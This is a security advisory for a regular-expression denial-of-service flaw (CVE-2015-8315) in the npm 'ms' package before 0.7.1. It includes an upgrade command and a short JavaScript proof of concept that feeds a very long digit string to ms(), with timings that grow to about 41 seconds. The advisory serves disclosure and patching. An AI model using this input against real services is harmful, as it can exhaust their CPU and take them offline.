GHSA-3fx5-fwvr-xrjg
Regular Expression Denial of Service in ms
Quick fix
GHSA-3fx5-fwvr-xrjg — ms: upgrade to the fixed version with the command below.
npm install ms@0.7.1Details
Versions of `ms` prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.
## Proof of Concept ```javascript var ms = require('ms'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; }
return result; }
ms(genstr(process.argv[2], "5") + " minutea");
```
### Results Showing increase in execution time based on the input string. ``` $ time node ms.js 10000
real 0m0.758s user 0m0.724s sys 0m0.031s
$ time node ms.js 20000
real 0m2.580s user 0m2.494s sys 0m0.047s
$ time node ms.js 30000
real 0m5.747s user 0m5.483s sys 0m0.080s
$ time node ms.js 80000
real 0m41.022s user 0m38.894s sys 0m0.529s ```
Are you affected?
Enter the version of the package you're using.
Affected packages
References
- https://nvd.nist.gov/vuln/detail/CVE-2015-8315[ADVISORY]
- https://github.com/unshiftio/millisecond[WEB]
- https://nodesecurity.io/advisories/46[WEB]
- https://support.f5.com/csp/article/K46337613?utm_source=f5support&%3Butm_medium=RSS[WEB]
- https://support.f5.com/csp/article/K46337613?utm_source=f5support&utm_medium=RSS[WEB]
- https://web.archive.org/web/20200227190911/http://www.securityfocus.com/bid/96389[WEB]
- http://www.openwall.com/lists/oss-security/2016/04/20/11[WEB]
- http://www.securityfocus.com/bid/96389[WEB]